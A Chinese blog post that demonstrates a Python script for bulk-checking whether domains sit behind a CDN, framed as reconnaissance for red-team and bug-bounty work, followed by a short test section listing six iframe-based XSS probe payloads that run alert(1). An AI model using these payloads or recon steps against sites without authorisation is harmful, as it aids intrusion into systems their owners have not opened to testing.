利用Python对网站是否使用CDN进行“粗暴”的判断

最新推荐文章于 2024-09-01 01:00:00 发布
最新推荐文章于 2024-09-01 01:00:00 发布
阅读量1.9k 收藏 11
点赞数 4
分类专栏: python 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42255372/article/details/103618431
版权

什么是CDN?

CDN全称Content Delivery Network即内容分发网络。
其简单说来就是为服务器建立一个缓存机制,它分布在各地不同的服务器中,当我们去访问使用了CDN的服务器域名的时候,它会根据我们的IP地址,选择离我们最近的CDN服务器,为我们提供更为快速的访问体验。
同时他也能隐藏服务器的真实IP,提升攻击门槛。

如何判断CDN?

网上其实也有很多关于如何判断对方网站是否使用了CDN的方法,比如nslookup,或者dig,或者ping,再或者收集一份CDN字典(注:很多CDN再HTTP的返回头中都有标识,只要你够肝,你就可以收集整理很大一部分的CDN标识字典)。
当然我觉得判断CDN最有效的方式其实还是使用全球PING,根据响应IP来进行判断。但是我没有这么多服务器,同时也不想去抓网站API接口来进行判断 :)

那么我是如何对CDN进行粗暴的判断的呢?

一个例子
我们会经常使用socket.getaddrinfo[host,port]这种方式去获取网站的IP

import socket
addr = socket.getaddrinfo('www.baidu.com','http')[0][4][0]
print(addr)

我只是个栗子
另一个例子
那么问题来了,如果我不指定port,我将其设置为None,这个时候,神奇的就来了,如果目标站点使用了CDN的话,那么getaddrinfo就会返回多个IP。

import socket

ip_list = []
addrs = socket.getaddrinfo('www.baidu.com', None)
for item in addrs:
    if item[4][0] not in ip_list:
        ip_list.append(item[4][0])
print(ip_list)

另一个栗子
最后
所以我的“粗暴”判断方式就是利用返回的IP数量来进行判断。(注:误报肯定是有的)

import socket
from threading import Thread, Semaphore

sm = Semaphore(20)
timeout = 5.0
# 超时判断
socket.setdefaulttimeout(timeout)


class ThreadWithReturnValue(Thread):
    def __init__(self, group=None, target=None, name=None, args=(), kwargs=None, *, daemon=None):
        Thread.__init__(self, group, target, name, args, kwargs, daemon=daemon)
        self._return = None

    def run(self):
        if self._target is not None:
                self._return = self._target(*self._args,**self._kwargs)

    def join(self):
        Thread.join(self)
        return self._return


def get_ip_list(domain):  # 获取域名解析出的IP列表
    dict = {}
    with sm:
        try:
            addrs = socket.getaddrinfo(domain, None)
            for item in addrs:
                if item[4][0] in dict:
                    dict.get(domain).append(str(item[4][0]))
                else:
                    dict.setdefault(domain, []).append(str(item[4][0]))
            # print('[*] Url: {} IP: {}'.format(domain, dict[domain][0]))
        except Exception as e:
            print('[-] Error: {} info: {}'.format(domain, e))
            pass
        except socket.timeout as e:
            print('[-] {} time out'.format(domain))
            pass
    return dict


def open_url_txt(filename):
    url_list = []
    with open(filename, 'r') as f:
        for l in f:
            url_list.append(l.strip())
    return url_list


def save_info(url, ip, key):
    if key == 1:
        with open('url_ip.csv', 'a+') as f:
            url_info = url + ',' + ip + '\n'
            f.write(url_info)

    else:
        with open('error_info.txt', 'a+') as f:
            f.write(url + ' ' + ','.join(ip) + '\n')



if __name__ == '__main__':
    url_list = open_url_txt('url_list.txt')
    thread_list = []
    for url in url_list:
        t = ThreadWithReturnValue(target=get_ip_list, args=(url,))
        thread_list.append(t)
        t.start()
    for t in thread_list:
        ip = t.join()
        if ip:
            for key in ip:
                if len(ip[key]) > 1:
                    print('[-] The Url: {} Maybe Exist CDN'.format(key))
                    save_info(key, ip[key], 0)
                else:
                    print('[*] Url:{} IP:{}'.format(key, ip[key][0]))
                    save_info(key, ip[key][0], 1)
    print('[*] End Scanner')

运行中

完成扫描的结果

疑似CDN的保存结果

最后的最后
我为什么要写这样一个脚本?其实不论是护网还是挖掘SRC,我们都会面临大量的域名,其中很大一部分都是部署了CDN的,如果我们盲目的使用端口扫描等工具的时候,会浪费我们大量的时间。并且我最近在写一个自己的信息收集框架,所以也算是为自己后面的框架写测试demo吧!😃
gayhub传送点:
https://github.com/HoldOnToYourHeart/qf_scan/blob/master/cdn_judge.py

以下为测试内容

1.1

<iframe οnlοad="alert(1)"></iframe>

1.2

<iframe src="javascript:alert(1)"></iframe>

1.3

<iframe src="vbscript:msgbox(1)"></iframe>

1.4

<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome

1.5

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

1.6

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

挖低危的清风
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何通过Python判断目标网站是否使用CDN
weixin_43263566的博客
05-26 1705
如何通过Python判断目标网站是否使用CDN
Java必知必会系列:性能优化与调优技巧
程序员光剑
09-24 1688
性能优化和系统调优是构建出色软件应用的关键环节。而性能优化可以分成两类:代码优化(Code Optimization)、硬件优化(Hardware Optimization)。本文基于2019年最新发布的JDK版本及其相关工具(如JIT Compiler),以及典型的应用场景(例如数据库查询优化、缓存优化等),阐述了性能优化的各个方面要点,并以实践案例的方式演示如何利用这些技巧进行优化。文章的主要读者为Java开发人员或技术经理。熟悉Java语言基本语法;有一定编程经验;了解JVM内部运行机制;
【信息收集】用python判断目标地址是否使用CDN(三)
微雨停了的博客
04-09 2635
文章目录前言一、利用nslookup判断是否存在cdn二、使用socket.getaddrinfo(host,port)获取网站的IP三、其他方法 前言 CDN(内容分发网络)原理:就是将内容缓存在终端用户附近。 具体来说,CDN就是采用更多的缓存服务器(CDN边缘节点),布放在用户访问相对集中的地区或网络中。当用户访问网站时,利用全局负载技术,将用户的访问指向距离最近的缓存服务器上,由缓存服务器响应用户请求。 一、利用nslookup判断是否存在cdn def isCDN(domain): # 判断
python爬虫判断_Python3 爬虫-判断 url 是否使用CDN
weixin_39595310的博客
02-10 237
原理:已知请求 url,获取域名,使用命令 :nslookup 域名然后从得到的结果中去找是否有 Addresses 字段,有且该字段下 ip 地址要大于等于 2 个,即说明使用CDNimport refrom urllib.parse import urlparseimport subprocessurl = "http://www.hahah.com.cn/?file=54565f4s5f...
Python-whichCDN能够检测给定的网站是否受内容分发网络的保护
08-10
whichCDN能够检测给定的网站是否受内容分发网络的保护
Python-通过扫描全网绕过CDN获取网站IP地址
08-10
Get website IP address by scanning the entire net 通过扫描全网绕过CDN获取网站IP地址
买票回家难?软件加速包也无用?看我用python轻松抢票回家
mengy7762的博客
11-13 3138
如果你对自己手速和市面上的各种 “加速包” 都没什么信心的话,不妨试试用程序员的手段抢票? 况且,[12306 官方宣布屏蔽了一大批付费抢票软件],这也意味着你即使给这些软件付了会员费,也依旧抢不到票。 所以只能回到最初的手动抢票?No!No!No! GitHub 上有两个 “年经” 项目,每到春运前一段时间,就会定时定点的登顶热榜,助力一代又一代程序员和姿势丰富的非程序员们抢票回家。 那么,这两个项目究竟怎么用?好不好用? 和手动抢票、第三方软件抢票比起来优势是否明显? 安装使用过程中,会不会遇到不可.
github python抢票_实测两款 GitHub 开源抢票插件,所有坑都帮你踩过了
weixin_39883462的博客
12-21 296
如果你对自己手速和市面上的各种 “加速包” 都没什么信心的话,不妨试试用程序员的手段抢票?况且,12306 官方宣布屏蔽了一大批付费抢票软件,这也意味着你即使给这些软件付了会员费,也依旧抢不到票。所以只能回到最初的手动抢票?No!No!No!GitHub 上有两个 “年经” 项目,每到春运前一段时间,就会定时定点的登顶热榜,助力一代又一代程序员和姿势丰富的非程序员们抢票回家。那么,这两个项目究竟怎...
使用kotlin在android下获取位置
weixin_34336292的博客
06-08 1885
2019独角兽企业重金招聘Python工程师标准>>> ...
cdnScan:一个简单的爬虫脚本,实现批量识别目标是否使用cdn服务
03-08
扫描 一个简单的爬虫脚本,实现批量识别目标是否使用cdn服务。 基于“站长之家”的多地ping功能服务,利用爬虫实现批量识别使用CDN的站点。 环境初始化 步骤一:下载谷歌浏览器以及对应版本的驱动器( )或下载云盘链接( (访问码:xlt7)) 步骤二:解压缩压缩包,将目录\ Chrome \ Application配置到系统环境变量;放入chromedriver.exe文件放置python3目录下;配置成功后,当CMD输入google-chrome可开启谷歌浏览器。 步骤三:pip3安装要求 使用方法:在targets.txt文件中,逐行输入需要检测的域名,然后运行cdnScan.py即可。
Python-批量测试B站海外CDN节点延迟找出最低延迟的节点.zip
11-04
Python-批量测试B站海外CDN节点延迟找出最低延迟的节点
Python-PortScanner目标tcp端口快速扫描banner识别cdn检测
08-10
PortScanner 目标tcp端口快速扫描、banner识别cdn检测
cdn检测+脚本+用于检测是否存在cdn
04-12
cdn检测+脚本+用于检测是否存在cdn
Python开发 CDN查询&子域名查询
她叫常玉莹
09-29 6198
import socket import os import sys import time import requests from bs4 import BeautifulSoup from urllib.parse import urlparse #获取ip地址 def get_ip(ip): data = socket.gethostbyname(ip) print(data) return data #端口检测状态 ''' 21/tcp FTP 文件传输协议 22/tc
Python3 爬虫-判断 url 是否使用CDN
weixin_39568072的博客
06-28 891
原理: 已知请求 url,获取域名,使用命令 :nslookup 域名 然后从得到的结果中去找是否有 Addresses 字段,有且该字段下 ip 地址要大于等于 2 个,即说明使用CDN import re from urllib.parse import urlparse import subprocess url = "http://www.hahah.com.cn/?file=54565f4s5f4d456d4g5df4gdf4" res = urlparse(self.url) d
安全编程|判断目标是否使用CDN脚本编写
s40d1's Blog
03-18 633
01前言 现在很多大网站基本上都使用CDN进行加速访问,方便快速响应用户的请求,提高用户访问体验。这种做法对于我们日常的渗透测试来说,CDN的虚假IP确实很干扰我们的测试。所以判断是否使用CDN对我们来说至关重要。 02基本原理 根据 CDN 的工作原理,如果网站使用CDN,那么从全国各地访问网站的 IP 地址是各个 CDN 节点的 IP 地址。在互联网上有许多网站提供 PING 命令的...
写一个python脚本实现:定时任务解析域名netcts.cdn-apple.com对应IP,并查询IP归属地,此IP是否ping成功,输出结果写入csv...
weixin_42599908的博客
01-08 182
好的,我可以帮助你写一个 Python 脚本来实现这个定时任务。首先,需要使用 Python 的 socket 库来解析域名,然后使用第三方模块 pygeoip 来查询 IP 归属地,最后使用 Python 的 subprocess 模块来执行 ping 命令并检查是否成功。 下面是具体的实现方式: 安装所需的模块: pipinstall pygeoip ...
自动化识别 CDN节点端口特征
大哥一声吼
10-09 2359
首先找一个存在cdn节点的网站 http://ping.chinaz.com/www.uniqlo.cn 通过在线网站查到的CDN节点示例   2、通过上一步可以看到,目标网站有很多cdn节点(未完全识别,需要我们进一步识别) 3、根据http头部,对其中一个确认的cnd节点进行端口分析 识别到的端口信息4、在此假设,目标网站使用了同一家cdn、并且cdn节点端口开放情况类似 5、利...
AI安全立法:加州新法案的争议与未来影响
最新发布
2301_79342058的博客
09-01 914
正如之前详细探讨过的那样,SB-1047法案要求AI模型的创建者在模型出现“对公共安全和安保构成新威胁”时,尤其是在“缺乏人类监督、干预或管理”的情况下,必须实施一种可以“关闭”该模型的“杀手开关”。不要错过这个机会,成为AI领域的领跑者。在周三宣布立法通过时,该法案的发起人、州参议员斯科特·维纳(Scott Weiner)引用了AI行业知名人士的支持,如Geoffrey Hinton和Yoshua Bengio(这两位去年也签署了一份声明,警告快速发展的AI技术可能带来的“灭绝风险”)。
利用云存储与CDN优化网站图片:OSS与CDN实战
"随着互联网用户的偏好转向图片和视频,网站开发与维护人员面临着存储和带宽资源的压力。为解决这一问题,将网站内容...利用OSS进行网站图片和视频的云存储,不仅提高了资源管理效率,也提升了网站的性能和可用性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值